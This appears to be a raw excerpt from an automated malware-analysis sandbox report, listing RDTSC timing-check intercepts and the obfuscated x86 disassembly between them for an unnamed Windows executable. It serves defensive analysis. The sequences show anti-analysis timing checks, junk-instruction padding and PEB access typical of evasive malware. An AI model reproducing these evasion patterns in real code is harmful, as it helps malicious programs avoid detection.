Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4DA036C second address: 4DA024D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F9153F881h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call dword ptr [7721188Ch] 0x0000000f mov edi, edi 0x00000011 push ebp 0x00000012 mov ebp, esp 0x00000014 push ecx 0x00000015 mov ecx, dword ptr [7FFE0004h] 0x0000001b mov dword ptr [ebp-04h], ecx 0x0000001e cmp ecx, 01000000h 0x00000024 jc 00007F7F91571355h 0x0000002a mov eax, 7FFE0320h 0x0000002f mov eax, dword ptr [eax] 0x00000031 mul ecx 0x00000033 shrd eax, edx, 00000018h 0x00000037 mov esp, ebp 0x00000039 pop ebp 0x0000003a ret 0x0000003b pushad 0x0000003c mov esi, 73BD3343h 0x00000041 pushad 0x00000042 pushad 0x00000043 popad 0x00000044 pushad 0x00000045 popad 0x00000046 popad 0x00000047 popad 0x00000048 pop ecx 0x00000049 pushad 0x0000004a mov bh, cl 0x0000004c popad 0x0000004d ret 0x0000004e nop 0x0000004f xor esi, eax 0x00000051 lea eax, dword ptr [ebp-10h] 0x00000054 push eax 0x00000055 call 00007F7F95EDC519h 0x0000005a mov edi, edi 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f mov cl, 1Eh 0x00000061 jmp 00007F7F9153F883h 0x00000066 popad 0x00000067 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4DA024D second address: 4DA027A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F91348E39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7F91348E2Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4DA027A second address: 4DA02A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F9153F881h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7F9153F883h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4DA02A7 second address: 4DA02AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4DA02AD second address: 4DA02BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F9153F87Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4DA02BC second address: 4DA02C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4DA02C0 second address: 4DA02FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F7F9153F885h 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushfd 0x00000014 jmp 00007F7F9153F87Ah 0x00000019 sub ax, EB58h 0x0000001e jmp 00007F7F9153F87Bh 0x00000023 popfd 0x00000024 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4DA02FF second address: 4DA0329 instructions: 0x00000000 rdtsc 0x00000002 mov ax, A80Fh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007F7F91348E34h 0x0000000d mov esi, 27B2DF91h 0x00000012 pop eax 0x00000013 popad 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4DA0329 second address: 4DA032D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4DA032D second address: 4DA0333 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D5001E second address: 4D50022 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D50022 second address: 4D50028 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D50028 second address: 4D50098 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7F9153F87Ch 0x00000009 jmp 00007F7F9153F885h 0x0000000e popfd 0x0000000f mov esi, 2B0265D7h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F7F9153F883h 0x0000001f jmp 00007F7F9153F883h 0x00000024 popfd 0x00000025 mov dx, cx 0x00000028 popad 0x00000029 xchg eax, ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F7F9153F881h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D50098 second address: 4D5009E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D5009E second address: 4D500A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D500A2 second address: 4D500A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D500A6 second address: 4D500C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov eax, ebx 0x0000000d mov cx, bx 0x00000010 popad 0x00000011 mov eax, dword ptr fs:[00000030h] 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov dx, ax 0x0000001d mov edi, ecx 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D500C6 second address: 4D50100 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F91348E2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 18h 0x0000000c jmp 00007F7F91348E2Eh 0x00000011 xchg eax, ebx 0x00000012 jmp 00007F7F91348E30h 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D50100 second address: 4D50104 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D50104 second address: 4D5010A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D5010A second address: 4D50168 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7F9153F885h 0x00000009 sub esi, 70025AE6h 0x0000000f jmp 00007F7F9153F881h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F7F9153F880h 0x0000001b sbb ecx, 54113688h 0x00000021 jmp 00007F7F9153F87Bh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a xchg eax, ebx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D50168 second address: 4D5016C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D5016C second address: 4D50187 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F9153F887h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D50187 second address: 4D501F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, D18Ah 0x00000007 pushfd 0x00000008 jmp 00007F7F91348E2Bh 0x0000000d sbb cx, C02Eh 0x00000012 jmp 00007F7F91348E39h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ebx, dword ptr [eax+10h] 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F7F91348E33h 0x00000027 sub ch, 0000003Eh 0x0000002a jmp 00007F7F91348E39h 0x0000002f popfd 0x00000030 movzx esi, bx 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D501F7 second address: 4D501FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D501FD second address: 4D5021F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7F91348E37h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D5021F second address: 4D502AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F9153F889h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F7F9153F887h 0x00000011 or al, 0000000Eh 0x00000014 jmp 00007F7F9153F889h 0x00000019 popfd 0x0000001a pushfd 0x0000001b jmp 00007F7F9153F880h 0x00000020 sub eax, 5AAF8988h 0x00000026 jmp 00007F7F9153F87Bh 0x0000002b popfd 0x0000002c popad 0x0000002d xchg eax, esi 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F7F9153F885h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D502AF second address: 4D50313 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, E932h 0x00000007 mov ebx, 7351667Eh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov esi, dword ptr [772406ECh] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F7F91348E2Eh 0x0000001e adc ecx, 234DFE48h 0x00000024 jmp 00007F7F91348E2Bh 0x00000029 popfd 0x0000002a pushfd 0x0000002b jmp 00007F7F91348E38h 0x00000030 adc si, 40A8h 0x00000035 jmp 00007F7F91348E2Bh 0x0000003a popfd 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D50313 second address: 4D5034E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F9153F889h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b jmp 00007F7F9153F87Eh 0x00000010 jne 00007F7F9154064Fh 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push ebx 0x0000001c pop ecx 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D5034E second address: 4D50354 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D50354 second address: 4D50358 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D50358 second address: 4D5039B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 jmp 00007F7F91348E2Ah 0x0000000e push eax 0x0000000f jmp 00007F7F91348E2Bh 0x00000014 xchg eax, edi 0x00000015 pushad 0x00000016 push ecx 0x00000017 mov ebx, 1815B786h 0x0000001c pop ebx 0x0000001d movzx esi, dx 0x00000020 popad 0x00000021 call dword ptr [77210B60h] 0x00000027 mov eax, 766BE5E0h 0x0000002c ret 0x0000002d pushad 0x0000002e mov edx, 09A412F8h 0x00000033 mov dh, 66h 0x00000035 popad 0x00000036 push 00000044h 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b mov ah, 56h 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D504E6 second address: 4D504EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D504EC second address: 4D5055C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a jmp 00007F7F91348E2Bh 0x0000000f je 00007F80037B7FCDh 0x00000015 pushad 0x00000016 mov al, 49h 0x00000018 mov ecx, ebx 0x0000001a popad 0x0000001b mov eax, 00000000h 0x00000020 jmp 00007F7F91348E38h 0x00000025 mov dword ptr [esi], edi 0x00000027 pushad 0x00000028 push esi 0x00000029 mov bx, 1F30h 0x0000002d pop edx 0x0000002e popad 0x0000002f mov dword ptr [esi+04h], eax 0x00000032 jmp 00007F7F91348E2Bh 0x00000037 mov dword ptr [esi+08h], eax 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F7F91348E35h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D5055C second address: 4D5059E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F9153F881h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+0Ch], eax 0x0000000c jmp 00007F7F9153F87Eh 0x00000011 mov eax, dword ptr [ebx+4Ch] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F7F9153F887h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D5059E second address: 4D505EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F91348E39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+10h], eax 0x0000000c jmp 00007F7F91348E2Eh 0x00000011 mov eax, dword ptr [ebx+50h] 0x00000014 jmp 00007F7F91348E30h 0x00000019 mov dword ptr [esi+14h], eax 0x0000001c pushad 0x0000001d mov ax, EA0Dh 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D506F8 second address: 4D5075C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 725Eh 0x00000007 pushfd 0x00000008 jmp 00007F7F9153F87Fh 0x0000000d adc ch, 0000000Eh 0x00000010 jmp 00007F7F9153F889h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov eax, dword ptr [ebx+64h] 0x0000001c jmp 00007F7F9153F87Eh 0x00000021 mov dword ptr [esi+28h], eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F7F9153F887h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D5075C second address: 4D50791 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F91348E39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+68h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov eax, edi 0x00000011 jmp 00007F7F91348E2Fh 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D50791 second address: 4D507BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F9153F889h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+2Ch], eax 0x0000000c pushad 0x0000000d mov eax, 372F9A43h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D507BA second address: 4D5081C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F7F91348E34h 0x0000000a sub ax, 7F08h 0x0000000f jmp 00007F7F91348E2Bh 0x00000014 popfd 0x00000015 popad 0x00000016 popad 0x00000017 mov ax, word ptr [ebx+6Ch] 0x0000001b pushad 0x0000001c mov ax, 869Bh 0x00000020 pushfd 0x00000021 jmp 00007F7F91348E30h 0x00000026 sbb eax, 3C202168h 0x0000002c jmp 00007F7F91348E2Bh 0x00000031 popfd 0x00000032 popad 0x00000033 mov word ptr [esi+30h], ax 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D5081C second address: 4D5084A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F7F9153F881h 0x0000000a adc si, E386h 0x0000000f jmp 00007F7F9153F881h 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D5084A second address: 4D50851 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D509BB second address: 4D509BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D509BF second address: 4D509C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D509C5 second address: 4D509E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F9153F888h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000001h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D509E9 second address: 4D509ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D509ED second address: 4D509F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D509F3 second address: 4D50A12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F91348E34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D50A12 second address: 4D50A18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D50A18 second address: 4D50A41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F91348E34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7F91348E2Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D50A41 second address: 4D50A58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F9153F87Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movzx ecx, bx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D50A58 second address: 4D50A7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F91348E38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-10h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D50A7D second address: 4D50A83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D50A83 second address: 4D50A89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D50A89 second address: 4D50AB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F9153F87Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7F9153F887h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D50AB7 second address: 4D50AE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F91348E39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dh, cl 0x0000000f mov edi, 708222CAh 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D50B72 second address: 4D50B76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D50B76 second address: 4D50B7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D50B7C second address: 4D50B96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F9153F886h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D50B96 second address: 4D50B9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D50B9A second address: 4D50BF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F80039AE397h 0x0000000e pushad 0x0000000f jmp 00007F7F9153F888h 0x00000014 popad 0x00000015 mov eax, dword ptr [ebp-0Ch] 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F7F9153F87Dh 0x00000021 sbb esi, 11370486h 0x00000027 jmp 00007F7F9153F881h 0x0000002c popfd 0x0000002d movzx ecx, di 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D50BF2 second address: 4D50CC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F91348E2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+04h], eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F7F91348E2Ch 0x00000014 or ecx, 48717258h 0x0000001a jmp 00007F7F91348E2Bh 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007F7F91348E38h 0x00000026 add ecx, 1614FCB8h 0x0000002c jmp 00007F7F91348E2Bh 0x00000031 popfd 0x00000032 popad 0x00000033 pushfd 0x00000034 jmp 00007F7F91348E38h 0x00000039 sbb eax, 798D3718h 0x0000003f jmp 00007F7F91348E2Bh 0x00000044 popfd 0x00000045 popad 0x00000046 lea eax, dword ptr [ebx+78h] 0x00000049 pushad 0x0000004a pushfd 0x0000004b jmp 00007F7F91348E34h 0x00000050 xor eax, 1AF22178h 0x00000056 jmp 00007F7F91348E2Bh 0x0000005b popfd 0x0000005c mov ebx, eax 0x0000005e popad 0x0000005f push 00000001h 0x00000061 jmp 00007F7F91348E32h 0x00000066 nop 0x00000067 pushad 0x00000068 movzx esi, dx 0x0000006b push eax 0x0000006c push edx 0x0000006d push edi 0x0000006e pop esi 0x0000006f rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D50CC7 second address: 4D50CE4 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F7F9153F87Eh 0x0000000d nop 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 movzx eax, dx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D50CE4 second address: 4D50D01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov edx, 0042DE5Ah 0x0000000b popad 0x0000000c lea eax, dword ptr [ebp-08h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7F91348E2Ch 0x00000016 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D50D01 second address: 4D50D39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F9153F87Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F7F9153F886h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F7F9153F87Dh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D50D39 second address: 4D50D4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F91348E31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
